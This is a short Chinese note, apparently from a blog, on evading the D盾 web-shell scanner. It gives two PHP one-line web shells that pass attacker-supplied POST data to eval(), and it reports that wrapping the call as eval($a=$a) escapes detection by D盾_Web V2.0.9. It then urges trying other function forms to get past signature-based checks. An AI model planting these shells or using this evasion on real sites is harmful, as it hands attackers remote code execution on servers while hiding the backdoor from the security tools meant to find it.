一个很简单的一个技巧,作个笔记,可以绕过D盾检测。
新建test1.php
<?php
eval($_POST[g]);
?>
新建test2.php
<?php $a="$_POST[g]"; eval($a=$a); ?>
使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。
那么问题就出现在eval($a=$a)这样的形式,eval()很容易就被查杀出来,但对于这样一种形式就无法查杀。
可以预见基于特征的代码查杀,在一定程度上能够检测出一些问题,但是对于一些特殊形式的变形,还是无法查杀。
PHP是一门很灵活的语言,可以通过它的特性,去尝试更多的函数形式,达到绕过的效果。